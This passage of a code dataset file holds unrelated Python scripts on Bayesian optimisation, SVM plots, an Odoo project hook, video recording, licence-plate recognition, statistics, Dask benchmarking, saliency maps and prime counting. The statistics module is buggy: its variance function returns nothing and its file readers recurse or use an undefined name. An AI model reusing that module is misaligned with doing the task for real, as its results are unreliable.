within 10% of optimum\n\nextraordinary_probability(ys, ys_noise, mx=mx, mn=mn, thresh=thresh)\n\n# %% [markdown]\n# We want to optimize $f_{\\text{hartmann6}}(x)$ subject to an additional constraint $|| x ||_0 <= 3$.\n#\n# This constraint isn't differentiable, but it can be approximated by a differentiable relaxation using a sum of narrow Gaussian basis functions.\n# Given a univariate Gaussian basis function $g_{\\ell}(x)$ centered at zero with $\\ell > 0$ small,\n# we can approximate the constraint by: $|| x ||_0 \\approx 6 - \\sum_{i=1}^6 g_{\\ell}(x_i) \\leq 3$, which reduces to $\\sum_{i=1}^6 g_{\\ell}(x_i) \\geq 3$.\n\n# %%\ndef narrow_gaussian(x, ell):\n    return torch.exp(-0.5 * (x / ell) ** 2)\n\n\ndef ineq_constraint(x, ell=1e-3):\n    # Approximation of || x ||_0 <= 3. The constraint is >= 0 to conform with SLSQP\n    return narrow_gaussian(x, ell).sum(dim=-1) - 3\n\n\n# %% [markdown]\n# ## BO-loop\n\n# %%\ndef get_batch_initial_conditions(n, X, Y, raw_samples):\n    \"\"\"Generate starting points for the acquisition function optimization.\"\"\"\n    # 1. Draw `raw_samples` Sobol points and randomly set three parameters to zero to satisfy the constraint\n    X_cand = SobolEngine(dimension=d, scramble=True).draw(raw_samples)\n    X_cand = normalize(X_cand).to(torch.double)\n    inds = torch.argsort(torch.rand(raw_samples, d), dim=-1)[:, :3]\n    X_cand[torch.arange(X_cand.shape[0]).unsqueeze(-1), inds] = 0\n\n    # 2. Fit a GP to the observed data, the right thing to do is to use the Ax model here\n    gp = SingleTaskGP(X, Y, outcome_transform=Standardize(m=1))\n    mll = ExactMarginalLogLikelihood(gp.likelihood, gp)\n    fit_gpytorch_model(mll)\n\n    # 3. Use EI to select the best points. Ideally, we should use the Ax acquisition function here as well\n    EI = ExpectedImprovement(model=gp, best_f=Y.min(), maximize=False)\n    X_cand = X_cand.unsqueeze(1)\n    acq_vals = EI(X_cand)\n    return X_cand[acq_vals.topk(n).indices]\n\n\n# %%\nBATCH_SIZE = 1\nif dummy:\n    N_INIT = 5\n    N_BATCHES = 2\nelse:\n    N_INIT = 10\n    N_BATCHES = 90\nprint(f\"Doing {N_INIT + N_BATCHES * BATCH_SIZE} evaluations\")\n\n# %%\n# Experiment\nexperiment = Experiment(\n    name=\"saasbo_experiment\",\n    search_space=search_space,\n    optimization_config=optimization_config,\n    runner=SyntheticRunner(),\n)\n\n# Initial Sobol points (set three random parameters to zero)\nsobol = Models.SOBOL(search_space=experiment.search_space)\nfor _ in range(N_INIT):\n    trial = sobol.gen(1)\n    keys = copy(subparam_names)\n    random.shuffle(keys)\n    for k in keys[:3]:\n        trial.arms[0]._parameters[k] = 0.0\n    experiment.new_trial(trial).run()\n\n# Run SAASBO\ndata = experiment.fetch_data()\nfor i in range(N_BATCHES):\n    model = Models.FULLYBAYESIAN(\n        experiment=experiment,\n        data=data,\n        num_samples=256,  # Increasing this may result in better model fits\n        warmup_steps=512,  # Increasing this may result in better model fits\n        gp_kernel=\"matern\",  # \"rbf\" is the default in the paper, but we also support \"matern\"\n        torch_dtype=torch.double,\n        verbose=False,  # Set to True to print stats from MCMC\n        disable_progbar=True,  # Set to False to print a progress bar from MCMC\n    )\n    batch_initial_conditions = get_batch_initial_conditions(\n        n=20, X=model.model.Xs[0], Y=model.model.Ys[0], raw_samples=1024\n    )\n    with warnings.catch_warnings():\n        warnings.simplefilter(\"ignore\")  # Filter SLSQP warnings\n        
generator_run = model.gen(\n            BATCH_SIZE,\n            model_gen_options={\n                \"optimizer_kwargs\": {\n                    \"linear_constraints\": [\n                        (torch.arange(d), torch.ones(d), 1)\n                    ],  # sum(x[:-1]) <= 1\n                    \"nonlinear_inequality_constraints\": [ineq_constraint],\n                    \"batch_initial_conditions\": batch_initial_conditions,\n                }\n            },\n        )\n\n    trial = experiment.new_batch_trial(generator_run=generator_run)\n    for arm in trial.arms:\n        arm._parameters = {k: 0.0 if v < 1e-3 else v for k, v in arm.parameters.items()}\n        assert sum([v > 1e-3 for v in arm.parameters.values()]) <= 3\n    trial.run()\n    data = Data.from_multiple_data([data, trial.fetch_data()])\n\n    fetched_data = trial.fetch_data()\n    new_value = fetched_data.df[\"mean\"].min()\n    # best_value = fetched_data.true_df[\"mean\"].min()\n    best_value = data.df[\"mean\"].min()\n\n    arm_parameters = [arm.parameters for arm in list(experiment.arms_by_name.values())]\n    arm_params = pd.DataFrame(arm_parameters).values\n    y_true = np.array([metric.f(v) for v in arm_params])\n    best_true_val = min(y_true)\n    print(\n        f\"Iteration: {i}, Best in iteration {new_value:.3f}, \",\n        f\"Best so far: {best_value:.3f}, \",\n        f\"Best true so far: {best_true_val:.3f}\",\n    )\n\n# %%\npd.options.display.float_format = \"{:,.3f}\".format\ndf = pd.DataFrame(arm_parameters)\ndf[\"x5\"] = np.round(1 - df.values.sum(axis=1), decimals=6)\ny_pred = data.df[\"mean\"]\ndf[\"y_pred\"] = y_pred\ndf[\"y_true\"] = y_true\nprint(df)\n\n# y_pred = df[]\nextraordinary_probability(y_true, y_pred, mx=mx, mn=mn)\n\nexperiment_dir = result_dir\nif dummy:\n    experiment_dir = join(\"dummy\", experiment_dir)\nexperiment_dir = join(\n    experiment_dir,\n    \"experiments\",\n    f\"{experiment.name}\",\n    f\"N_INIT_{N_INIT}_BATCH_SIZE_{BATCH_SIZE}_N_BATCHES_{N_BATCHES}\",\n)\nPath(experiment_dir).mkdir(exist_ok=True, parents=True)\nexperiment_fpath = join(experiment_dir, \"experiment.json\")\nsave_experiment(experiment, experiment_fpath)\n\ndf.to_csv(join(experiment_dir, \"results.csv\"))\n","sub_path":"comp_saas.py","file_name":"comp_saas.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"551523649","text":"import sys\n# locate other code files\nsys.path.append(\"../..\")\n\nimport numpy as np\nfrom solve import *\nfrom gen_data import make_data\nfrom printer import create_anim\n\nname = \"c_poly\"\ny_coords = np.linspace(-2, 2, 5)\nvar_vals = np.linspace(0.5, 1, 3)\nparams = np.arange(2, 6)\nslacks = np.logspace(-1, 7, 10)\nseed = 5\n\ncounter = 0\nK = len(y_coords)*len(var_vals)*len(params)*len(slacks)\nfor k in range(len(params)):\n    anim_files = [\"\"]*len(y_coords)*len(var_vals)\n    for i in range(len(var_vals)):\n        for j in range(len(y_coords)):\n            for c in range(len(slacks)):\n                Ns = [10, 10, 20]\n                points = np.array([(-2, 0), (2, 0), (0, y_coords[j])])\n                vars = np.array([var_vals[i]]*3)\n                classes = np.array([1, 1, -1])\n\n                make_data(Ns, points, vars, classes, out=\"test\", seed=seed)\n                anim_file = \"{}{}.jpg\".format(name, counter)\n                title = \"Var={:0.3f}, param={}, slack={:0.3f}\".format(var_vals[i], params[k], slacks[c])\n                solve(\"test.npz\", kern_type=\"poly\", kern_param=params[k], out=anim_file, plot=False, title=title, slack=slacks[c])\n                anim_files[j] = anim_file\n                counter += 1\n                print(\"image {}/{}\".format(counter, K))\n    # print(\"creating animation\")\n    # create_anim(anim_files, out=\"anim_p{}.mp4\".format(params[k]), duration=0.4)\n","sub_path":"support vector machines/moving_clusters_slack/poly/generate_poly.py","file_name":"generate_poly.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"329972871","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass account_analytic_account_improvements(models.Model):\n    _inherit = 'account.analytic.account'\n\n    first_subscription_id = fields.Many2one(comodel_name='sale.subscription', string=\"Subscription\", compute='_compute_first_subscription')\n\n    @api.one\n    def _compute_first_subscription(self):\n        if self.subscription_ids and len(self.subscription_ids) > 0 :\n            self.first_subscription_id = self.subscription_ids[0]\n\n    @api.cr_uid_id_context\n    def project_create(self, cr, uid, analytic_account_id, vals, context=None):\n        \n        project_id = super(account_analytic_account_improvements, self).project_create(cr, uid, analytic_account_id, vals, context=context)\n        if project_id != False:\n            \n            project_project_obj = self.pool.get('project.project')\n            project_project = project_project_obj.browse(cr, uid, project_id)\n\n            analytic_account_obj = self.pool.get('account.analytic.account')\n            analytic_account = analytic_account_obj.browse(cr, uid, analytic_account_id)\n\n            if analytic_account.first_subscription_id:\n                \n                project_template_id = analytic_account.first_subscription_id.template_id.project_id if analytic_account.first_subscription_id.template_id else False\n                if project_template_id != False:\n\n                    #Sets the project attributes\n                    project_project.write({\n                            'name': \"%s - %s\" % (project_template_id.name, analytic_account.first_subscription_id.partner_id.name),\n                            'partner_id': analytic_account.first_subscription_id.partner_id.id,\n                            'user_id': project_template_id.user_id.id,\n                            'color': project_template_id.color,\n                            'privacy_visibility': project_template_id.privacy_visibility,\n                        })\n\n                    #Adds the team users from the analytic account in the project team\n                    #-----------------------------------------------------------------\n\n                    #if project_project.analytic_account_id.contract_team:\n                    #    for user in project_project.analytic_account_id.contract_team.users:\n                    #        query = \"\"\"\n                    #                INSERT INTO project_user_rel (uid, project_id)\n                    #                VALUES (%s,%s)\n                    #                \"\"\"\n                    #        cr.execute(query, (str(user.id),str(project_id)))\n\n\n                    #Attributes in page \"Other Info\"\n                    #-------------------------------\n                    \n                    #project_project.date_start = project_project.analytic_account_id.date_start\n                    #project_project.date = project_project.analytic_account_id.date\n                    #project_project.project_escalation_id = project_project_template.project_escalation_id.id\n\n                    #Sets the project stages\n                    #-----------------------\n                    #Removes the old project stages\n                    query = \"\"\"\n                            DELETE FROM project_task_type_rel\n                            WHERE project_id=%s\n                            \"\"\"\n                    
cr.execute(query, [str(project_id)])\n\n                    #Adds the new project stages from the project template\n                    for stage in project_template_id.type_ids:\n                        query = \"\"\"\n                                INSERT INTO project_task_type_rel (type_id, project_id)\n                                VALUES (%s,%s)\n                                \"\"\"\n                        cr.execute(query, (str(stage.id),str(project_id)))\n\n\n                    #removes the project followers\n                    #query = \"\"\"\n                    #        DELETE FROM mail_followers\n                    #        WHERE res_id=%s and res_model=%s\n                    #        \"\"\"\n                    #cr.execute(query, (str(project_id), 'project.issue'))\n        \n        return project_id\n","sub_path":"account_analytic_account_improvements/models/account_analytic_account.py","file_name":"account_analytic_account.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"138520614","text":"#!/usr/bin/python\n\nfrom Cocoa import *\nfrom Foundation import *\n\ntxt = NSString.stringWithFormat_(\"Hello %@\", \"world\")\nfontSize = 13.0\ntxtColor = NSColor.blackColor()\ntxtAttr = NSDictionary.dictionaryWithObjectsAndKeys_(\n  NSFont.systemFontOfSize_(fontSize), NSFontAttributeName,\n  txtColor, NSForegroundColorAttributeName\n  )\n\n# NSLog(\"[Pass]\")","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"81504527","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 23 23:33:24 2021\n\n@author: admin\n\"\"\"\n\n#pascal triangle\nn = int(input(\"n value? \"))\nst=\" \"\nmain = []\nls = [1]\nls1 = [1]\nls2 = [1,1]\nmain.append(ls1)\nmain.append(ls2)\nfor j in range(n-2):\n    for i in range(len(ls2)-1):\n        result = ls2[i]+ls2[i+1]\n        ls.append(result)\n       \n    \n    ls.append(1)\n    main.append(ls)\n    ls2=ls\n    ls = [1]\n    \n \n\nfor x in range(1,n+1):\n    print((n-x)*st,main[x-1])","sub_path":"projects/Pascal Triangle.py","file_name":"Pascal Triangle.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"386409249","text":"#!/usr/bin/python3\n# This program is licensed under GPLv3.\nfrom os import path\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('GdkX11', '3.0')\ngi.require_version('GstVideo', '1.0')\nfrom gi.repository import GObject, Gst, Gtk\n\n# Needed for get_xid(), set_window_handle()\nfrom gi.repository import GdkX11, GstVideo\n\n# Needed for timestamp on file output\nfrom datetime import datetime\nGObject.threads_init()\nGst.init(None)\nlocation = '/dev/video0'\n\nclass Player(Gtk.Window):\n    def __init__(self):\n        Gtk.Window.__init__(self, title=\"Liveview\")\n        self.connect('destroy', self.quit)\n        self.set_default_size(800, 450)\n\n        # Create DrawingArea for video widget\n        self.drawingarea = Gtk.DrawingArea()\n\n        # Create a grid for the DrawingArea and buttons\n        grid = Gtk.Grid()\n        self.add(grid)\n        grid.attach(self.drawingarea, 0, 1, 2, 1)\n        # Needed or else the drawing area will be really small (1px)\n        self.drawingarea.set_hexpand(True)\n        self.drawingarea.set_vexpand(True)\n\n        # Quit button\n        quit = Gtk.Button(label=\"Quit\")\n        quit.connect(\"clicked\", Gtk.main_quit)\n        grid.attach(quit, 0, 0, 1, 1)\n\n        # Record/Stop button\n        self.record = Gtk.Button(label=\"Record\")\n        self.record.connect(\"clicked\", self.record_button)\n        grid.attach(self.record, 1, 0, 1, 1)\n\n        # Create GStreamer pipeline\n        self.pipeline = Gst.parse_launch(\"v4l2src device=\" + location + \" ! tee name=tee ! queue name=videoqueue ! deinterlace ! xvimagesink\")\n\n        # Create bus to get events from GStreamer pipeline\n        bus = self.pipeline.get_bus()\n        bus.add_signal_watch()\n        bus.connect('message::eos', self.on_eos)\n        bus.connect('message::error', self.on_error)\n\n        # This is needed to make the video output in our DrawingArea:\n        bus.enable_sync_message_emission()\n        bus.connect('sync-message::element', self.on_sync_message)\n\n    def run(self):\n        self.show_all()\n        self.xid = self.drawingarea.get_property('window').get_xid()\n        self.pipeline.set_state(Gst.State.PLAYING)\n        Gtk.main()\n\n    def quit(self, window):\n        self.pipeline.set_state(Gst.State.NULL)\n        Gtk.main_quit()\n\n    def on_sync_message(self, bus, msg):\n        if msg.get_structure().get_name() == 'prepare-window-handle':\n            print('prepare-window-handle')\n            msg.src.set_window_handle(self.xid)\n\n    def on_eos(self, bus, msg):\n        print('on_eos(): seeking to start of video')\n        self.pipeline.seek_simple(\n            Gst.Format.TIME,\n            Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,\n            0\n        )\n\n    def on_error(self, bus, msg):\n        print('on_error():', msg.parse_error())\n\n    def start_record(self):\n        # Filename (current time)\n        filename = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\") + \".avi\"\n        print(filename)\n        self.recordpipe = Gst.parse_bin_from_description(\"queue name=filequeue ! jpegenc ! avimux ! 
filesink location=\" + filename, True)\n        self.pipeline.add(self.recordpipe)\n        self.pipeline.get_by_name(\"tee\").link(self.recordpipe)\n        self.recordpipe.set_state(Gst.State.PLAYING)\n\n    def stop_record(self):\n        filequeue = self.recordpipe.get_by_name(\"filequeue\")\n        filequeue.get_static_pad(\"src\").add_probe(Gst.PadProbeType.BLOCK_DOWNSTREAM, self.probe_block)\n        self.pipeline.get_by_name(\"tee\").unlink(self.recordpipe)\n        filequeue.get_static_pad(\"sink\").send_event(Gst.Event.new_eos())\n        print(\"Stopped recording\")\n\n    def record_button(self, widget):\n        if self.record.get_label() == \"Record\":\n            self.record.set_label(\"Stop\")\n            self.start_record()\n        else:\n            self.stop_record()\n            self.record.set_label(\"Record\")\n\n    def probe_block(self, pad, buf):\n        print(\"blocked\")\n        return True\n\np = Player()\np.run()\n","sub_path":"python/gst-camera-record.py","file_name":"gst-camera-record.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"300551341","text":"# Copyright (c) 2019, RangerUFO\n#\n# This file is part of alpr_utils.\n#\n# alpr_utils is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# alpr_utils is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with alpr_utils.  If not, see .\n\nimport time\nimport mxnet as mx\nimport matplotlib.pyplot as plt\nfrom gluoncv import model_zoo, data\nimport cv2\nfrom read_plate import ReadPlate\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy\nfrom utils.drawchinese import DrawChinese\n\n\ndef load_image(path):\n    with open(path, \"rb\") as f:\n        buf = f.read()\n    return mx.image.imdecode(buf)\n\n\ndef fixed_crop(raw, bbox):\n    x0 = max(int(bbox[0].asscalar()), 0)\n    x0 = min(int(x0), raw.shape[1])\n    y0 = max(int(bbox[1].asscalar()), 0)\n    y0 = min(int(y0), raw.shape[0])\n    x1 = max(int(bbox[2].asscalar()), 0)\n    x1 = min(int(x1), raw.shape[1])\n    y1 = max(int(bbox[3].asscalar()), 0)\n    y1 = min(int(y1), raw.shape[0])\n    return mx.image.fixed_crop(raw, x0, y0, x1 - x0, y1 - y0)\n\n\ndef test(images):\n    context = mx.cpu(0)\n    yes = 0\n    count = 0\n    yesss = 0\n    yolo = model_zoo.get_model('yolo3_darknet53_voc', pretrained=True, ctx=context)\n    read_plate = ReadPlate()\n    for path in images:\n\n        label = path.split('/')[-1].split('_')[0]\n        # print(label)\n        # exit()\n        '''加载图片'''\n        raw = load_image(path)\n        # print(raw.shape)\n        ts = time.time()\n        # print('aaaaaaaaaaaaa')\n        '''图片归一化'''\n        x, _ = data.transforms.presets.yolo.transform_test(raw, short=512)\n        # print(x)\n        '''得到侦测结果'''\n        classes, scores, bboxes = yolo(x.as_in_context(context))\n        # print(classes.shape)\n        '''反算回归框'''\n        bboxes[0, :, 0::2] = bboxes[0, :, 0::2] / x.shape[3] * raw.shape[1]\n        bboxes[0, :, 1::2] = bboxes[0, :, 1::2] / x.shape[2] * raw.shape[0]\n        vehicles = [\n            fixed_crop(raw, bboxes[0, i]) for i in range(classes.shape[1])\n            if (yolo.classes[int(classes[0, i].asscalar())] == 'car' or\n                yolo.classes[int(classes[0, i].asscalar())] == 'bus') and\n               scores[0, i].asscalar() > 0.5\n        ]\n        # print(vehicles)\n        # exit()\n        # print(\"yolo profiling: %f\" % (time.time() - ts))\n        for i, raw in enumerate(vehicles):\n            # print(\"vehicle[%d]:\" % i)\n            # print(raw)\n            image = raw.asnumpy()\n            image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n            # cv2.imshow('a', image)\n            # cv2.waitKey()\n            count += 1\n            '''侦测网络、字符变量、字符识别网络、图片、样本尺寸、阈��、车牌高宽(48,144)、使用定向搜索,定向尺寸、设备'''\n            results = read_plate(image)\n            for plate, box in results:\n                print(yes,yesss,count,yes/count,yesss/count,label,plate)\n                if label == plate:\n                    yes+=1\n                if label[1:]==plate[1:]:\n                    yesss+=1\n                image = cv2.rectangle(image, (int(box[0]), int(box[1])), (int(box[2]), 
int(box[3])), (0, 0, 255), 2)\n                image = DrawChinese(image, plate, (int(box[0]), int(box[1])-50), 40,(200,0,0))\n                cv2.imshow('a',image)\n                cv2.waitKey(0)\n                break\n            break\n    print(yes,count,yes/count)\n\n\nif __name__ == \"__main__\":\n    import os\n\n    images = []\n    for file_name in os.listdir('/home/cq/public/hibiki/CCPD2019/test'):\n        # for image_name in os.listdir(f'/home/cq/public/hibiki/CCPD2019/ccpd_db/{file_name}'):\n        images.append(f'/home/cq/public/hibiki/CCPD2019/test/{file_name}')\n    test(images)\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"149758313","text":"from statistics import variance\nfrom typing import List\nimport math\ndef zcount(list: List[float]) -> float:\n    return len(list)\n    #print(\"stat test\")\n    #print(\"zcount should 5==\"), zcount ([1.0,2.0,3.0,4.0,5.0]) \n\ndef zmean(list: List[float]) -> float:\n    return sum(list) / zcount(list)\n    \ndef zmode(list: List[float]) -> float:\n    return max(set(list) , key = list.count)\n    \ndef zmedian(list: List[float]) -> float:\n    sortedlst = sorted(list)\n    lstlen = len(list)\n    index = (lstlen - 1) //2\n    if(lstlen %2):\n        return sortedlst[index]\n    else:\n        return (sortedlst[index] + sortedlst[index +1])/2.0\n\ndef zvariance(list: List[float]) -> float:\n    n = zcount(list) - 1\n    mean = zmean(list)\n    deviation = [abs(mean - xi) ** 2 for xi in list]\n    variance = sum(deviation) / n\n\n\ndef zstddev(list: List[float]) -> float:\n\n    var = zvariance(list)\n\n    return math.sqrt(var)\n\n\ndef zstderr(list: List[float]) -> float:\n\n    sd = zstddev(list)\n    n = zcount(list)\n\n    return sd / math.sqrt(n)\n\n\ndef zcov(listx: List[float], listy: List[float]) -> float:\n\n    n = zcount(listx)\n    sum_of_product = 0\n    counter = 0\n\n    while counter < len(listx):\n        product = listx[counter] * listy[counter]\n        sum_of_product += product\n        counter += 1\n\n    sums = (sum(listx) * sum(listy)) / n\n\n    cov = (sum_of_product - sums) / (n - 1)\n    return cov\n\n\ndef zcorr(listx: List[float], listy: List[float]) -> float:\n\n    cov = zcov(listx, listy)\n    sx = zstddev(listx)\n    sy = zstddev(listy)\n\n    return (cov) / (sx * sy)\n\ndef readDataSet(files):\n#    print(\"in readDataSets...\", files)\n    data = {}\n    for file in files:\n        twoLists = readDataSet(file)\n        data[file] = twoLists    \n    return data\n\ndef readDataFile(fname):\n    x,y =  ([],[])\n    with open(file) as f:\n        first_line = f.readline() #consume headers\n        for l in f:\n            row = l.split(',')\n            print(row, type (row))\n            x.append(float(row[0]))\n            y.append(float(row[1]))\n        return (x,y)","sub_path":"statzcw/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"53139002","text":"\ndef main():\n    import os\n    OMP_NUM_THREADS = '1'\n    OPENBLAS_NUM_THREADS = '1'\n    MKL_NUM_THREADS = '1'\n    os.environ[\"OMP_NUM_THREADS\"] = OMP_NUM_THREADS  # export OMP_NUM_THREADS=4\n    os.environ[\"OPENBLAS_NUM_THREADS\"] = OPENBLAS_NUM_THREADS  # export OPENBLAS_NUM_THREADS=4\n    os.environ[\"MKL_NUM_THREADS\"] = MKL_NUM_THREADS  # export MKL_NUM_THREADS=6\n\n    import json\n    import zarr\n    import dask.array as da\n    from dask.distributed import Client\n    import time\n    import traceback\n\n    from lmdec.decomp import PowerMethod\n\n    data_directory = '/nfs/pool002/users/tnonet/SNP_Zarr'\n    #data_directory = '/Users/tnonet/Documents/SNP_matrices'\n    matrix = '160K_640K'\n    matrix_path = os.path.join(data_directory, matrix + '.zarr')\n    json_file_path = '_'.join(['March1', 'PM_test', matrix]) + '.json'\n\n    assert os.path.isdir(matrix_path)\n\n    assert not os.path.isfile(json_file_path)\n\n    logs = dict()\n    k = 10\n    max_iterations = 200\n    time_limit = 6400\n    buffer = 10\n    tol = 1e-6\n    num_runs = 1\n    p = 1\n    worker_list = [2, 4, 8]\n    memory_list = ['50GB', '100GB', '200GB']\n    score = 'rmse'\n    logs['k'] = k\n    logs['p'] = p\n    logs['num_runs'] = num_runs\n    logs['max_iterations'] = max_iterations\n    logs['scoring'] = score\n    logs['b'] = buffer\n    logs['time_limit'] = time_limit\n    logs['tol'] = tol\n    logs['date'] = time.time()\n    logs['worker'] = worker_list\n    logs['memory'] = memory_list\n    try:\n        root = zarr.open(matrix_path, mode='r')\n        array = da.from_zarr(root)\n        for run in range(num_runs):\n            for work in worker_list:\n                for mem in memory_list:\n                    client = Client(n_workers=work,\n                                    threads_per_worker=1,\n                                    memory_limit=mem)\n                    PM = PowerMethod(max_iter=max_iterations,\n                                     k=k,\n                                     buffer=buffer,\n                                     p=p,\n                                     tol=tol,\n                                     scoring_method=score,\n                                     time_limit=time_limit,\n                                     track_metrics=True)\n                    _, _, _ = PM.svd(array)\n                    client.close()\n                    logs[str((work, mem, run))] = [str(PM.metrics), str(PM.time), str(PM.times)]\n\n                    with open(json_file_path, 'w', encoding='utf-8') as f:\n                        json.dump(logs, f, ensure_ascii=False, indent=4)\n\n\n    except Exception:\n        traceback.print_exc()\n        with open(json_file_path, 'w', encoding='utf-8') as f:\n            json.dump(logs, f, ensure_ascii=False, indent=4)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"matrix_test_MARCH1.py","file_name":"matrix_test_MARCH1.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"396397564","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmodel = keras.models.load_model('1/9.hdf5')\n\n_img = keras.preprocessing.image.load_img(\n    'train/train/00013.jpg',\n    grayscale=True,\n    target_size=(48, 48))\n\n# preprocess image to get it into the right format for the model\nimg = keras.preprocessing.image.img_to_array(_img)\nimg = img.reshape((1, *img.shape))\ny_pred = model.predict(img)\n\nimages = tf.Variable(img, dtype=float)\n\nwith tf.GradientTape() as tape:\n    pred = model(images, training=False)\n    class_idxs_sorted = np.argsort(pred.numpy().flatten())[::-1]\n    loss = pred[0][class_idxs_sorted[0]]\n\ngrads = tape.gradient(loss, images)\ndgrad_abs = tf.math.abs(grads)\ndgrad_max_ = np.max(dgrad_abs, axis=3)[0]\n\n# normalize to range between 0 and 1\narr_min, arr_max  = np.min(dgrad_max_), np.max(dgrad_max_)\ngrad_eval = (dgrad_max_ - arr_min) / (arr_max - arr_min + 1e-18)\n\nfig, axes = plt.subplots(1,2,figsize=(14,5))\naxes[0].imshow(_img, cmap='gray')\ni = axes[1].imshow(grad_eval, cmap=\"jet\",alpha=0.8)\nfig.colorbar(i)\nplt.show()\n\n# # Find the index of the to be visualized layer above\n# layer_index = utils.find_layer_idx(model, 'dense_2')\n#\n# # Swap softmax with linear\n# model.layers[layer_index].activation = keras.activations.linear\n# model = utils.apply_modifications(model)\n#\n# # Numbers to visualize\n# indices_to_visualize = [ 0, 12, 38, 83, 112, 74, 190 ]\n#\n# # Visualize\n# for index_to_visualize in indices_to_visualize:\n#   # Get input\n#   input_image = input_test[index_to_visualize]\n#   # Class object\n#   classes = {\n#     0: 'airplane',\n#     1: 'automobile',\n#     2: 'bird',\n#     3: 'cat',\n#     4: 'deer',\n#     5: 'dog',\n#     6: 'frog',\n#     7: 'horse',\n#     8: 'ship',\n#     9: 'truck'\n#   }\n#   input_class = np.argmax(target_test[index_to_visualize])\n#   input_class_name = classes[input_class]\n#   # Matplotlib preparations\n#   fig, axes = plt.subplots(1, 2)\n#   # Generate visualization\n#   visualization = visualize_saliency(model, layer_index, filter_indices=input_class, seed_input=input_image)\n#   axes[0].imshow(input_image)\n#   axes[0].set_title('Original image')\n#   axes[1].imshow(visualization)\n#   axes[1].set_title('Saliency map')\n#   fig.suptitle(f'CIFAR10 target = {input_class_name}')\n#   plt.show()\n\n\n# Reference:\n# https://usmanr149.github.io/urmlblog/cnn/2020/05/01/Salincy-Maps.html","sub_path":"hw3/saliency.py","file_name":"saliency.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"242668700","text":"from update_model4 import horse_trend\r\nfrom db.db import singleton_ResultsDb\r\n\r\n\r\ndef updateData(race_results_rows, immd_rows, today_race_start_time, cur_row, update_table, race_No, horse_No):\r\n    # odd_trend\r\n    horse_code = cur_row['horse_code']\r\n    win_odds = float(cur_row['win_odds'])\r\n    odd_trend = horse_trend.getOddsTrend(horse_code, win_odds, race_results_rows)\r\n\r\n    # odd_wave\r\n    race_date = cur_row['race_date']\r\n    odd_wave = horse_trend.getOddsWave(race_date, race_No, horse_No, win_odds, today_race_start_time, immd_rows)\r\n\r\n    sql_update = '''update {} set odd_trend=%s, odd_wave=%s where race_date=%s and race_no=%s and horse_no=%s'''.format(update_table)\r\n    cur_data = (odd_trend, odd_wave, race_date, race_No, horse_No)\r\n    singleton_ResultsDb.cursor.execute(sql_update, cur_data)\r\n\r\n\r\n","sub_path":"20190521/update_immd_model4/update_model4/update_data_win_odds.py","file_name":"update_data_win_odds.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"145736416","text":"# Count the number of prime numbers less than\n# 2 million and time how long it takes\n# Compares the performance of two different\n# algorithms.\nfrom time import clock\nfrom math import sqrt\ndef count_primes(n):\n    '''\n    Generates all the prime numbers from 2 to n - 1.\n    n - 1 is the largest potential prime considered.\n    '''\n    start = clock() # Record start time\n    count = 0\n    for val in range(2, n):\n        result = True # Provisionally, n is prime\n        root = int(sqrt(val) + 1)\n        # Try all potential factors from 2 to the square root of n\n        trial_factor = 2\n        while result and trial_factor <= root:\n            result = (val % trial_factor != 0 ) # Is it a factor?\n            trial_factor += 1 # Try next candidate\n        if result:\n            count += 1\n    stop = clock() # Stop the clock\n    print(\"Count =\", count, \"Elapsed time:\", stop - start, \"seconds\")\ndef seive(n):\n    '''\n    Generates all the prime numbers from 2 to n - 1.\n     n - 1 is the largest potential prime considered.\n    Algorithm originally developed by Eratosthenes.\n    '''\n    start = clock() # Record start time\n    # Each position in the Boolean list indicates\n    # if the number of that position is not prime:\n    # false means \"prime,\" and true means \"composite.\"\n    # Initially all numbers are prime until proven otherwise\n    nonprimes = n * [False] # Global list initialized to all False\n    count = 0\n    # First prime number is 2; 0 and 1 are not prime\n    nonprimes[0] = nonprimes[1] = True\n    # Start at the first prime number, 2.\n    